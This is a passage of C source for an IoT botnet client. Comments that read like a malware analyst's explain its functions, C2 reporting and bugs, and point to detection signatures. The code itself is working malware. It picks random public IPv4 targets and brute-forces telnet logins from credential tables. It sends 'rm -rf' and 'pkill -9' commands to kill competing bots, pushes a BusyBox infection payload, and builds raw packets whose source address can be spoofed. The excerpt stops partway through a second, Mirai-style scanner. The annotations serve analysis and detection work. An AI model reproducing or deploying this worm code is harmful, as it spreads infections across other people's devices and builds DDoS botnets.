  669. int zprintf(const unsigned char *format, ...) { // printf replacement writing to stdout through print(); returns the character count.
  670. va_list args;
  671. va_start( args, format );
  672. return print( 0, format, args );
  673. }
  674. int szprintf(unsigned char *out, const unsigned char *format, ...) { // sprintf replacement: formats into out (no size limit, caller must size the buffer) and NUL-terminates; returns the character count.
  675. va_list args;
  676. va_start( args, format );
  677. return print( &out, format, args );
  678. }
  679. int sockprintf(int sock, char *formatStr, ...) { // Formats a message into a 2048-byte heap buffer, appends '\n', echoes it to stdout, and sends it on sock with MSG_NOSIGNAL. Returns send()'s result. This is how the bot reports back to the C2, so its output strings are useful for building network signatures.
  680. unsigned char *textBuffer = malloc(2048);
  681. memset(textBuffer, 0, 2048);
  682. char *orig = textBuffer; // print() advances textBuffer; orig keeps the start for send/free
  683. va_list args;
  684. va_start(args, formatStr);
  685. print(&textBuffer, formatStr, args);
  686. va_end(args);
  687. orig[strlen(orig)] = '\n'; // overwrites the terminator; the zeroed buffer supplies the next NUL
  688. zprintf("%s\n", orig);
  689. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
  690. free(orig);
  691. return q;
  692. }
  693. int wildString(const unsigned char* pattern, const unsigned char* string) { // Recursive case-insensitive glob match supporting '*' (any run) and '?' (one char). Inverted result: returns 0 on a full match, non-zero otherwise. Used with the Bot_Killer_Binarys patterns.
  694. switch(*pattern) {
  695. case '\0': return *string; // pattern exhausted: match only if string is too
  696. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
  697. case '?': return !(*string && !wildString(pattern+1, string+1));
  698. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
  699. }
  700. }
  701. int getHost(unsigned char *toGet, struct in_addr *i) { // Parses toGet as a dotted-quad IPv4 string into *i via inet_addr; no DNS lookup is done (the hostent local is unused). Returns 0 on success, 1 when inet_addr reports INADDR_NONE.
  702. struct hostent *h;
  703. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
  704. return 0;
  705. }
  706. void makeRandomStr(unsigned char *buf, int length) { // Fills buf with length random uppercase letters ('A'..'Z', codes 65..90) from rand_cmwc. No terminator is written.
  707. int i = 0;
  708. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
  709. }
  710. int recvLine(int socket, unsigned char *buf, int bufsize) { // Reads one newline-terminated line from the C2 connection one byte at a time. The socket argument is used only in the select() calls; the actual recv() always reads from the global mainCommSock. Waits up to 30 s for readability, retrying the wait up to 10 more times. Returns the number of bytes stored before the newline, or -1 if recv() fails (buf is NUL-terminated either way).
  711. memset(buf, 0, bufsize);
  712. fd_set myset;
  713. struct timeval tv;
  714. tv.tv_sec = 30;
  715. tv.tv_usec = 0;
  716. FD_ZERO(&myset);
  717. FD_SET(socket, &myset);
  718. int selectRtn, retryCount;
  719. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) { // same set passed as read and exception sets
  720. while(retryCount < 10) {
  721. tv.tv_sec = 30;
  722. tv.tv_usec = 0;
  723. FD_ZERO(&myset);
  724. FD_SET(socket, &myset);
  725. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  726. retryCount++;
  727. continue;
  728. }
  729. break;
  730. }
  731. }
  732. unsigned char tmpchr;
  733. unsigned char *cp;
  734. int count = 0;
  735. cp = buf;
  736. while(bufsize-- > 1) { // leave room for the terminator
  737. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
  738. *cp = 0x00;
  739. return -1;
  740. }
  741. *cp++ = tmpchr;
  742. if(tmpchr == '\n') break; // the newline is stored but not counted
  743. count++;
  744. }
  745. *cp = 0x00;
  746. return count;
  747. }
  748. int connectTimeout(int fd, char *host, int port, int timeout) { // TCP connect with a timeout: puts fd in non-blocking mode, calls connect(), waits up to timeout seconds for writability, and checks SO_ERROR. host must be a dotted quad (see getHost). Returns 1 when connected, 0 on any failure; fd is switched back to blocking only on success.
  749. struct sockaddr_in dest_addr;
  750. fd_set myset;
  751. struct timeval tv;
  752. socklen_t lon;
  753. int valopt;
  754. long arg = fcntl(fd, F_GETFL, NULL);
  755. arg |= O_NONBLOCK;
  756. fcntl(fd, F_SETFL, arg);
  757. dest_addr.sin_family = AF_INET;
  758. dest_addr.sin_port = htons(port);
  759. if(getHost(host, &dest_addr.sin_addr)) return 0;
  760. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  761. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  762. if (res < 0) {
  763. if (errno == EINPROGRESS) { // expected for a non-blocking connect
  764. tv.tv_sec = timeout;
  765. tv.tv_usec = 0;
  766. FD_ZERO(&myset);
  767. FD_SET(fd, &myset);
  768. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
  769. lon = sizeof(int);
  770. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  771. if (valopt) return 0; // connect completed with an error
  772. }
  773. else return 0; // timed out or select() failed
  774. }
  775. else return 0;
  776. }
  777. arg = fcntl(fd, F_GETFL, NULL);
  778. arg &= (~O_NONBLOCK);
  779. fcntl(fd, F_SETFL, arg);
  780. return 1;
  781. }
  782. int listFork() { // fork() wrapper that records the child's PID in the global pids array (reallocated by copy each time). Returns fork()'s result: 0 in the child, the child's PID in the parent. Because parent is uint32_t, a failed fork() (-1) is not recognised as a failure by the `<= 0` test.
  783. uint32_t parent, *newpids, i;
  784. parent = fork();
  785. if (parent <= 0) return parent;
  786. numpids++;
  787. newpids = (uint32_t*)malloc((numpids + 1) * 4);
  788. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
  789. newpids[numpids - 1] = parent;
  790. free(pids);
  791. pids = newpids;
  792. return parent;
  793. }
  794. int negotiate(int sock, unsigned char *buf, int len) { // Minimal telnet option handling: given an IAC sequence in buf (buf[1] = command, buf[2] = option), replies with IAC followed by a refusal — DONT for WONT, WONT for DONT, otherwise WONT/DONT for DO/WILL — and echoes the option byte. The OPT_SGA branch compares the command byte rather than buf[2]. Always returns 0; len is unused.
  795. unsigned char c;
  796. switch (buf[1]) {
  797. case CMD_IAC: return 0;
  798. case CMD_WILL:
  799. case CMD_WONT:
  800. case CMD_DO:
  801. case CMD_DONT:
  802. c = CMD_IAC;
  803. send(sock, &c, 1, MSG_NOSIGNAL);
  804. if (CMD_WONT == buf[1]) c = CMD_DONT;
  805. else if (CMD_DONT == buf[1]) c = CMD_WONT;
  806. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
  807. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
  808. send(sock, &c, 1, MSG_NOSIGNAL);
  809. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
  810. break;
  811. default:
  812. break;
  813. }
  814.  
  815. return 0;
  816. }
  817. int matchPrompt(char *bufStr) { // Returns 1 if the last non-blank character of bufStr (ignoring trailing NUL, space, CR, LF) is one of the shell prompt characters ':' '>' '%' '$' '#', else 0.
  818. char *prompts = ":>%$#\0";
  819. int bufLen = strlen(bufStr);
  820. int i, q = 0;
  821. for(i = 0; i < strlen(prompts); i++) {
  822. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++; // q starts at the terminator and walks back over trailing blanks; it persists across prompt characters
  823. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
  824. }
  825. return 0;
  826. }
  827. in_addr_t getRandomPublicIP() { // Picks a random IPv4 target for the telnet scanner, re-drawing until the address falls outside the listed reserved/private/special-use blocks, and returns it in network byte order via inet_addr. rand()%223 caps the first octet at 222.
  828. static uint8_t ipState[4] = {0};
  829. ipState[0] = rand() % 223;
  830. ipState[1] = rand() % 255;
  831. ipState[2] = rand() % 255;
  832. ipState[3] = rand() % 255;
  833. while(
  834. (ipState[0] == 0) ||
  835. (ipState[0] == 10) ||
  836. (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
  837. (ipState[0] == 127) ||
  838. (ipState[0] == 169 && ipState[1] == 254) ||
  839. (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
  840. (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
  841. (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
  842. (ipState[0] == 192 && ipState[1] == 168) ||
  843. (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
  844. (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
  845. (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
  846. (ipState[0] >= 224)
  847. )
  848. {
  849. ipState[0] = rand() % 223;
  850. ipState[1] = rand() % 255;
  851. ipState[2] = rand() % 255;
  852. ipState[3] = rand() % 255;
  853. }
  854. char ip[16] = {0};
  855. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  856. return inet_addr(ip);
  857. }
  858.  
  859. in_addr_t MiraiIPRanges() // Alternative random-target generator carrying Mirai's exclusion list (loopback, RFC 1918, several large corporate and US government /8s, multicast). Same draw/re-draw structure and return convention as getRandomPublicIP. Not called within this chunk.
  860. {
  861. static uint8_t ipState[4] = {0};
  862. ipState[0] = rand() % 223;
  863. ipState[1] = rand() % 255;
  864. ipState[2] = rand() % 255;
  865. ipState[3] = rand() % 255;
  866. while(
  867. (ipState[0] == 127) || // 127.0.0.0/8 - Loopback
  868. (ipState[0] == 0) || // 0.0.0.0/8 - Invalid address space
  869. (ipState[0] == 3) || // 3.0.0.0/8 - General Electric Company
  870. (ipState[0] == 15 || ipState[0] == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
  871. (ipState[0] == 56) || // 56.0.0.0/8 - US Postal Service
  872. (ipState[0] == 10) || // 10.0.0.0/8 - Internal network
  873. (ipState[0] == 192 && ipState[1] == 168) || // 192.168.0.0/16 - Internal network
  874. (ipState[0] == 172 && ipState[1] >= 16 && ipState[1] < 32) || // 172.16.0.0/14 - Internal network
  875. (ipState[0] == 100 && ipState[1] >= 64 && ipState[1] < 127) || // 100.64.0.0/10 - IANA NAT reserved
  876. (ipState[0] == 169 && ipState[1] > 254) || // 169.254.0.0/16 - IANA NAT reserved
  877. (ipState[0] == 198 && ipState[1] >= 18 && ipState[1] < 20) || // 198.18.0.0/15 - IANA Special use
  878. (ipState[0] == 224) || // 224.*.*.*+ - Multicast
  879. (ipState[0] == 6 || ipState[0] == 7 || ipState[0] == 11 || ipState[0] == 21 || ipState[0] == 22 || ipState[0] == 26 || ipState[0] == 28 || ipState[0] == 29 || ipState[0] == 30 || ipState[0] == 33 || ipState[0] == 55 || ipState[0] == 214 || ipState[0] == 215) // US Department of Defense /8 blocks
  880. )
  881. {
  882. ipState[0] = rand() % 223;
  883. ipState[1] = rand() % 255;
  884. ipState[2] = rand() % 255;
  885. ipState[3] = rand() % 255;
  886. }
  887. char ip[16] = {0};
  888. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  889. return inet_addr(ip);
  890. }
  891.  
  892. in_addr_t getRandomIP(in_addr_t netmask) { // Random address on the bot's own network: keeps the bits of ourIP covered by netmask (host byte order) and randomises the rest with rand_cmwc.
  893. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
  894. return tmp ^ ( rand_cmwc() & ~netmask);
  895. }
  896. unsigned short csum (unsigned short *buf, int count) { // Internet checksum (RFC 1071) over count bytes: sums 16-bit words, adds a trailing odd byte, folds the carries and returns the one's complement.
  897. register uint64_t sum = 0;
  898. while( count > 1 ) { sum += *buf++; count -= 2; }
  899. if(count > 0) { sum += *(unsigned char *)buf; }
  900. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
  901. return (uint16_t)(~sum);
  902. }
  903. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) { // TCP checksum for a raw-socket packet, computed over a locally built pseudo-header plus the fixed-size TCP header only (no payload bytes are included). Part of the raw-packet support used by the flood routines later in the file.
  904. struct tcp_pseudo {
  905. unsigned long src_addr;
  906. unsigned long dst_addr;
  907. unsigned char zero;
  908. unsigned char proto;
  909. unsigned short length;
  910. } pseudohead;
  911. unsigned short total_len = iph->tot_len; // read but not used
  912. pseudohead.src_addr=iph->saddr;
  913. pseudohead.dst_addr=iph->daddr;
  914. pseudohead.zero=0;
  915. pseudohead.proto=IPPROTO_TCP;
  916. pseudohead.length=htons(sizeof(struct tcphdr));
  917. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
  918. unsigned short *tcp = malloc(totaltcp_len);
  919. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
  920. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
  921. unsigned short output = csum(tcp,totaltcp_len);
  922. free(tcp);
  923. return output;
  924. }
  925. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) { // Fills a raw IPv4 header: IHL 5 (no options), TTL MAXTTL, random identification from rand_cmwc, total length = header + packetSize, checksum left at 0 for the caller to compute. The caller supplies source, so spoofed source addresses are possible here — egress filtering (BCP 38) on the network is the mitigation.
  926. iph->ihl = 5;
  927. iph->version = 4;
  928. iph->tos = 0;
  929. iph->tot_len = sizeof(struct iphdr) + packetSize;
  930. iph->id = rand_cmwc();
  931. iph->frag_off = 0;
  932. iph->ttl = MAXTTL;
  933. iph->protocol = protocol;
  934. iph->check = 0;
  935. iph->saddr = source;
  936. iph->daddr = dest;
  937. }
  /*
   * close() guard: refuses to close stdin/stdout/stderr (fd < 3) and returns 1
   * in that case; otherwise closes fd and returns 0. close()'s own result is
   * discarded.
   */
  938. int sclose(int fd) {
  939. if(3 > fd) return 1;
  940. close(fd);
  941. return 0;
  942. }
  /*
   * Telnet credential-scanning worm loop (the "spreader"). Runs forever in a
   * forked child; wait_usec is the per-poll select/read timeout and maxfds
   * caps the number of concurrent connection slots (also bounded by
   * getdtablesize() - 100). Each slot walks a state machine against a random
   * public IPv4 address on TCP/23:
   *   0 pick target / next credential, non-blocking connect
   *   1 wait for connect completion (7 s budget)
   *   2 wait for login prompt        3 send username
   *   4 wait for password prompt     5 send password
   *   6 wait for shell/failure; report "Successfully Bruted" to the C2
   *   7 send `rm -rf <Temp_Directorys>` and `pkill/killall -9 <Bot_Killer_Binarys>`
   *     to the victim (competitor-bot removal), report to C2
   *   8 send "sh", "shell" and Busybox_Payload (the infection command),
   *     watch for the "CONNECTED" marker, report success/failure
   * Helpers and tables used here (telstate_t, read_until_response,
   * contains_fail/contains_success, advance_telstate/reset_telstate,
   * get_telstate_host, advances/advances2, Telnet_Usernames/Telnet_Passwords,
   * Temp_Directorys, Bot_Killer_Binarys, Busybox_Payload, RemoveTempDirs,
   * mainCommSock, sockprintf, getRandomPublicIP) are defined outside this
   * excerpt. Every C2 report below leaks the victim IP and the working
   * credential pair over mainCommSock - useful as a detection signature.
   */
  943. void TelnetScanner(int wait_usec, int maxfds)
  944. {
  // buf, cur_dir, num_tmps, j and line are declared but never used.
  945. int max = getdtablesize() - 100, i, res, num_tmps, j;
  946. 
  947. char buf[128], cur_dir;
  948. if (max > maxfds)
  949. max = maxfds;
  950. fd_set fdset;
  951. struct timeval tv;
  952. socklen_t lon;
  953. int valopt;
  954. 
  955. 
  956. 
  957. char line[256];
  958. char* buffer;
  959. struct sockaddr_in dest_addr;
  960. dest_addr.sin_family = AF_INET;
  961. dest_addr.sin_port = htons(23);
  962. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  963. 
  // One SOCKBUF_SIZE receive buffer is shared by EVERY slot (see the loop
  // below): each slot's sockbuf points at this same allocation, so a read on
  // one connection overwrites whatever another slot last received.
  964. buffer = malloc(SOCKBUF_SIZE + 1);
  965. memset(buffer, 0, SOCKBUF_SIZE + 1);
  966. 
  // Variable-length array sized by the caller's maxfds (500/1000 from the ON
  // command, or an attacker-chosen atoi() value from FASTLOAD).
  967. struct telstate_t fds[max];
  968. 
  // This memset length (max * 5 bytes) does not match the array size; it is
  // harmless only because each element is zeroed again in the loop below.
  969. memset(fds, 0, max * (sizeof(int) + 1));
  970. for(i = 0; i < max; i++)
  971. {
  972. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  973. fds[i].complete = 1;
  974. fds[i].sockbuf = buffer;
  975. }
  976. while(1) {
  977. for(i = 0; i < max; i++) {
  // A zero tTimeout means "start the clock now"; states that finish a step
  // stamp it again so the 7 s / 10 s budgets below are per-step.
  978. if(fds[i].tTimeout == 0) {
  979. fds[i].tTimeout = time(NULL);
  980. }
  981. switch(fds[i].state) {
  982. case 0:
  983. {
  // complete == 1: slot is free; wipe it (keeping the shared buffer pointer)
  // and pick a fresh random public target. The memset also zeroes
  // `complete`, so the next pass through state 0 takes the == 0 branch.
  984. if(fds[i].complete == 1)
  985. {
  986. char *tmp = fds[i].sockbuf;
  987. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  988. fds[i].sockbuf = tmp;
  989. 
  990. fds[i].ip = getRandomPublicIP();
  991. }
  // complete == 0: previous credential failed on this host. Both indices
  // advance together, so the two tables are tried as positional PAIRS, not
  // as a full cross product; the host is abandoned when either runs out.
  992. else if(fds[i].complete == 0)
  993. {
  994. fds[i].usernameInd++;
  995. fds[i].passwordInd++;
  996. 
  997. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
  998. {
  999. fds[i].complete = 1;
  1000. continue;
  1001. }
  1002. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
  1003. {
  1004. fds[i].complete = 1;
  1005. continue;
  1006. }
  1007. }
  1008. 
  1009. dest_addr.sin_family = AF_INET;
  1010. dest_addr.sin_port = htons(23);
  1011. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1012. dest_addr.sin_addr.s_addr = fds[i].ip;
  1013. 
  1014. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1015. 
  // socket() failure (e.g. fd exhaustion) just skips the slot this pass.
  1016. if(fds[i].fd == -1) continue;
  1017. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1018. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
  1019. {
  1020. reset_telstate(&fds[i]);
  1021. }
  1022. else
  1023. {
  1024. advance_telstate(&fds[i], 1);
  1025. }
  1026. }
  1027. break;
  1028. 
  1029. case 1:
  1030. {
  // Poll this one socket for writability; SO_ERROR distinguishes a
  // completed connect from a refused/unreachable one.
  1031. FD_ZERO(&fdset);
  1032. FD_SET(fds[i].fd, &fdset);
  1033. tv.tv_sec = 0;
  1034. tv.tv_usec = wait_usec;
  1035. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  1036. 
  1037. if(res == 1) {
  // Clearing to 0 restarts the clock at the top of the next pass.
  1038. fds[i].tTimeout = 0;
  1039. lon = sizeof(int);
  1040. valopt = 0;
  1041. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1042. if(valopt)
  1043. {
  1044. reset_telstate(&fds[i]);
  1045. }
  1046. else
  1047. {
  // Connected: switch back to blocking mode for the prompt/response reads.
  1048. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  1049. advance_telstate(&fds[i], 2);
  1050. }
  1051. continue;
  1052. }
  1053. else if(res == -1)
  1054. {
  1055. reset_telstate(&fds[i]);
  1056. continue;
  1057. }
  1058. if(fds[i].tTimeout + 7 < time(NULL))
  1059. {
  1060. reset_telstate(&fds[i]);
  1061. }
  1062. }
  1063. break;
  1064. case 2:
  1065. {
  // Wait for the login prompt (`advances` holds the prompt strings). A
  // failure string sends the slot back to state 0, which - with complete
  // still 0 - moves on to the next credential pair for the same host.
  1066. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  1067. {
  1068. fds[i].tTimeout = time(NULL);
  1069. if(contains_fail(fds[i].sockbuf))
  1070. {
  1071. advance_telstate(&fds[i], 0);
  1072. }
  1073. else
  1074. {
  1075. advance_telstate(&fds[i], 3);
  1076. }
  1077. continue;
  1078. }
  1079. if(fds[i].tTimeout + 7 < time(NULL))
  1080. {
  1081. reset_telstate(&fds[i]);
  1082. }
  1083. }
  1084. break;
  1085. case 3:
  1086. {
  // Username, then CRLF, as two sends; MSG_NOSIGNAL avoids SIGPIPE on a
  // peer that already closed.
  1087. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
  1088. {
  1089. reset_telstate(&fds[i]);
  1090. continue;
  1091. }
  1092. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1093. {
  1094. reset_telstate(&fds[i]);
  1095. continue;
  1096. }
  1097. advance_telstate(&fds[i], 4);
  1098. }
  1099. break;
  1100. case 4:
  1101. {
  // Wait for the password prompt.
  1102. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  1103. {
  1104. fds[i].tTimeout = time(NULL);
  1105. if(contains_fail(fds[i].sockbuf))
  1106. {
  1107. advance_telstate(&fds[i], 0);
  1108. }
  1109. else
  1110. {
  1111. advance_telstate(&fds[i], 5);
  1112. }
  1113. continue;
  1114. }
  1115. if(fds[i].tTimeout + 7 < time(NULL))
  1116. {
  1117. reset_telstate(&fds[i]);
  1118. }
  1119. }
  1120. break;
  1121. case 5:
  1122. {
  1123. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
  1124. {
  1125. reset_telstate(&fds[i]);
  1126. continue;
  1127. }
  1128. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1129. {
  1130. reset_telstate(&fds[i]);
  1131. continue;
  1132. }
  1133. advance_telstate(&fds[i], 6);
  1134. }
  1135. break;
  1136. case 6:
  1137. {
  // Post-login response (`advances2`). A recognised shell prompt is a hit:
  // the victim IP and credential pair are reported to the C2 before the
  // slot moves on to cleanup/infection. Nothing in this excerpt sets
  // complete to 2, so the quiet branch appears unreachable from here.
  1138. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
  1139. {
  1140. fds[i].tTimeout = time(NULL);
  1141. 
  1142. if(contains_fail(fds[i].sockbuf))
  1143. {
  1144. advance_telstate(&fds[i], 0);
  1145. }
  1146. else if(contains_success(fds[i].sockbuf))
  1147. {
  1148. if(fds[i].complete == 2)
  1149. {
  1150. advance_telstate(&fds[i], 7);
  1151. }
  1152. else
  1153. {
  1154. sockprintf(mainCommSock, "[!] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1155. advance_telstate(&fds[i], 7);
  1156. }
  1157. }
  1158. else
  1159. {
  1160. reset_telstate(&fds[i]);
  1161. }
  1162. continue;
  1163. }
  1164. if(fds[i].tTimeout + 7 < time(NULL))
  1165. {
  1166. reset_telstate(&fds[i]);
  1167. }
  1168. }
  1169. break;
  1170. 
  1171. case 7:
  1172. {
  1173. 
  // Anti-competitor stage. Both commands are formatted with sprintf() into
  // fixed 80-byte stack buffers; the bound depends entirely on the length
  // of the Temp_Directorys / Bot_Killer_Binarys globals (not shown).
  // RemoveTempDirs() is also run LOCALLY on the bot, not only on the victim.
  1174. char RemoveTheTempDirs [80];
  1175. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  1176. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1177. RemoveTempDirs();
  1178. sockprintf(mainCommSock, "[!] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1179. 
  1180. char killtheproccesses[80];
  1181. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  1182. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1183. sockprintf(mainCommSock, "[!] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1184. 
  1185. advance_telstate(&fds[i], 8);
  1186. }
  1187. break;
  1188. case 8:
  1189. {
  // Infection stage. Note tTimeout is re-stamped at the top of EVERY pass
  // through this state, so the 10 s check at the bottom can only fire if
  // read_until_response itself stalls that long; otherwise the slot stays
  // in state 8 and re-sends "sh", "shell" and the payload on each pass
  // until a send() fails. Expect repeated payload lines on a victim.
  1190. fds[i].tTimeout = time(NULL);
  1191. 
  // The two `if (...) < 0);` lines end in an empty statement: results are
  // deliberately (or accidentally) ignored.
  1192. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
  1193. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
  1194. 
  1195. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1196. sockprintf(mainCommSock, "[!] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1197. 
  1198. 
  // "CONNECTED" is the marker the downloaded payload is expected to print;
  // complete = 3 suppresses duplicate success reports for this slot.
  1199. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "CONNECTED"))
  1200. {
  1201. 
  1202. if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
  1203. {
  // Formats the address with inet_ntoa() here, unlike the other reports
  // which use get_telstate_host().
  1204. sockprintf(mainCommSock, "[!] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1205. fds[i].complete = 3;
  1206. }
  1207. }
  1208. 
  1209. if(fds[i].tTimeout + 10 < time(NULL))
  1210. {
  1211. if(fds[i].complete!=3)
  1212. {
  1213. sockprintf(mainCommSock, "[!] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1214. }
  1215. reset_telstate(&fds[i]);
  1216. }
  1217. break;
  1218. }
  1219. }
  1220. }
  1221. }
  1222. }
  1223.  
  /*
   * Second telnet spreader, a near copy of TelnetScanner with three
   * differences: targets come from MiraiIPRanges() instead of
   * getRandomPublicIP(), the credential tables are Mirai_Usernames /
   * Mirai_Passwords, and the infection stage waits 45 s instead of 10 s.
   * Same per-slot state machine (0 connect, 1 wait, 2-5 prompt/username/
   * prompt/password, 6 result, 7 competitor cleanup, 8 payload); see the
   * TelnetScanner comments for the shared mechanics. All helpers and tables
   * are defined outside this excerpt.
   * Copy/paste defects worth knowing when reading C2 traffic from this bot:
   *  - in state 0 the password-exhausted branch lacks `continue`, so a slot
   *    can proceed to connect with passwordInd == table size and later index
   *    one past the end of Mirai_Passwords in state 5;
   *  - the two reports in state 7 print Telnet_Usernames/Telnet_Passwords
   *    (the other scanner's tables) with this scanner's indices, so those
   *    two messages show wrong credentials;
   *  - state 8 never sets complete = 3, so "Infection Success" is repeated
   *    on every pass that sees the marker.
   */
  1224. void MiraiScanner(int wait_usec, int maxfds)
  1225. {
  // buf, cur_dir, num_tmps, j and line are declared but never used.
  1226. int max = getdtablesize() - 100, i, res, num_tmps, j;
  1227. char buf[128], cur_dir;
  1228. if (max > maxfds)
  1229. max = maxfds;
  1230. fd_set fdset;
  1231. struct timeval tv;
  1232. socklen_t lon;
  1233. int valopt;
  1234. char line[256];
  1235. char* buffer;
  1236. struct sockaddr_in dest_addr;
  1237. dest_addr.sin_family = AF_INET;
  1238. dest_addr.sin_port = htons(23);
  1239. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  // Single receive buffer shared by all slots (each sockbuf points here).
  1240. buffer = malloc(SOCKBUF_SIZE + 1);
  1241. memset(buffer, 0, SOCKBUF_SIZE + 1);
  1242. struct telstate_t fds[max];
  // Wrong memset length (max * 5 bytes); each element is re-zeroed below.
  1243. memset(fds, 0, max * (sizeof(int) + 1));
  1244. for(i = 0; i < max; i++) {
  1245. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1246. fds[i].complete = 1;
  1247. fds[i].sockbuf = buffer;
  1248. }
  1249. while(1) {
  1250. for(i = 0; i < max; i++) {
  1251. if(fds[i].tTimeout == 0) {
  1252. fds[i].tTimeout = time(NULL);
  1253. }
  1254. switch(fds[i].state) {
  1255. case 0:
  1256. {
  // Free slot: wipe (keeping the shared buffer) and draw a target from the
  // Mirai range generator.
  1257. if(fds[i].complete == 1)
  1258. {
  1259. 
  1260. char *tmp = fds[i].sockbuf;
  1261. memset(&(fds[i]), 0, sizeof(struct telstate_t));
